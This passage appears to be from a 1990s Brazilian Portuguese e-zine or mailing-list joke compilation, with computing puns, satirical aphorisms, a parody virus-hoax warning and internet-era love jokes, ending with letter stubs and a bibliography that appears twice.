Quando você recebe o seu percentual sempre imagina se com outro     cafetão não receberia mais.  ------------------------------------------- Taglines  Quem é da área da computação não tem defeitos, tem BUG`s;  não tem memória fraca, tem pouca memória RAM;  não acorda de manhã,dá um boot nas idéias;  não namora, faz um download em alguém;  Não transa, se conecta a alguém;  não brocha, tem uma queda de conecção,  e por último não caga, passa um e-mail  Obs: Tem uma Silvia R.G. que realmente arruma piadas..  > Dicionário >  >   > "O asterisco nada mais é do que um ponto final > Hippie." >  > "O que é um intelectual? Apenas um homem que > descobriu alguma coisa mais interessante do que as > mulheres." >  > "Loteria: acho que, jogando ou não, você tem a mesma > chance de ganhar." >  > "Um expert é um homem que parou de pensar. Para que > pensar, se ele é um expert?" >   > "A arte da Medicina consiste em distrair enquanto a > Natureza cuida da doença." >  > "Plano Real é uma idéia na cabeça e uma câmara de > Deputados na mão." >  > "Um repórter de rock é um jornalista que não sabe > escrever, entrevistando gente que não sabe falar, > para pessoas que não sabem ler." >  > "Os conservadores são pessimistas quanto ao futuro e > otimistas quanto ao passado." >  > "Uma celebridade é uma pessoa que trabalha duro a > vida inteira para se tornar conhecida, e depois > passa a usar óculos escuros para não ser conhecida." >  > "A morte de uma pessoa é uma tragédia; a de milhões, > uma estatística." >  > "Escrever é transformar os seus piores momentos em > dinheiro." >  > "Morte é a vida respondendo à pergunta: 'Por quê?'." >  > "Lixo: coisas que jogamos fora. Coisas: lixo que > guardamos." >  > "Advogado: Forma larval de um político." >  > "Bibliotecas: Não há respostas, apenas referências > cruzadas." >  > "Matemática é a linguagem que Deus usou para > escrever o Universo." >  > "O homem contemporâneo é o elo perdido entre macacos > e seres humanos." >  > "Multitarefa: Ler no banheiro." >  > "Filosofia: Respostas obscuras para questões > insolúveis." >  > "Canela: Dispositivo para achar móveis no escuro." >  > "O mais nobre de todos os cachorros é o > cachorro-quente: ele alimenta a mão que o morde." >  > "Gato: um autômato flexível e indestrutível, > fornecido pela natureza para ser chutado quando as > coisas vão mal no círculo doméstico." >  > "Chato: Uma pessoa que fala quando deveria estar > ouvindo." >  > "Lógica: método sistemático de chegar a conclusão > errada com confiança." >  >  ------------------------------ Atencao: ha um novo virus solto por aih.      Eh pior que tudo que jah viu. Ele trabalha alterando a posicao dos pinos das portas seriais e revertendo o  sentido da rotacao do disco rigido.     Mais de 300.000 sistemas jah foram infectados em  Murphy, West Dakota. E isso em apenas doze meses.      Veja como prevenir o avanco do mal:    1-Nao ligue o computador na tomada!    2-Nao use baterias! Ha rumores de que o virus invadiu boa parte das fabricas de baterias e infectou os polos positivos delas(solucao:tente conectar apenas o polo  negativo).    3-Nao faca upload ou download de programas pela Internet    4-Nao acumule arquivos nos floppy disks ou no disco rigido    5-Nao leia mensagens! Nem esta!    6-Nao use portas seriais, modens ou linhas telefonicas    7-Nao use teclados, scanners ou impressoras.    8-Nao acesse CPUs, memorias, microprocessadores ou mainframes    9-Nao use luz eletrica, aquecimento a gaz ou ar-condicionado, agua corrente, fogo, roupas ou mesmo a roda!  Tenha que certeza de que, seguindo a risca esses noves passos, seu virus sera erradicado. (*inclusive voce do resto da civilizacao!).:-) ------------------------------------------------

                 Amar e > >        Se voce ainda pensa que amar e ir ao cinema, tomar sorvete e abrir  >a >porta para ela, sinceramente, voce n o sabe que ja inventaram a INTERNET?? > >        Amar e > >        Amar e: >        enviar pra ela e-mail com background de coracaozinho. > >        Amar e: >        enviar mailbomb pro cara que passou cantada publica nela. > >        Amar e: >        enviar todos os 100 Sonetos de Amor do Neruda, um por dia, >        religiosamente. >        Nao obstante ainda contar como acordou, contar que escovou >        os dentes, tomou cafe e tudo mais. E Ela lendo... > >        Amar e: >        fazer Home Page dedicada especialmente pra Ela. > >        Amar e: >        IMAGINAR como ela deve estar linda  hoje (Tera passado a >        tendinite?). > >        Amar e: >        enviar flores virtuais pedindo desculpas quando chegar >        atrasado para o chat. > >        Amar e: >        ela nao engolir as desculpas, nao responder as mensagens e >        ficar away no ICQ. > >        Amar e: >        fazer icqxo. > >        Amar e: >        criar juntos um Tamagouchi virtual. > >        Amar e: >        contar a ela tudo o que voce nao contaria ao vivo. > >        Amar e: >        fazer com ela tudo o que voce nao faz ao vivo. > 

Para sair ou pesquisar historico da lista, visite: http://listas.ansp.br -------------------------------

Cartinhas:

REsposta:

Aguardem o meu livro...

Bibliografia:

A maior parte das notícias veio da página http://www.hackernews.com ou da lista da http://cnn.com

sar e me ensinar a ser um hacker VALEU!!!!!

REsposta:

Aguardem o meu livro...

Bibliografia:

A maior parte das notícias veio da página http://www.hackernews.com ou da lista da http://cnn.com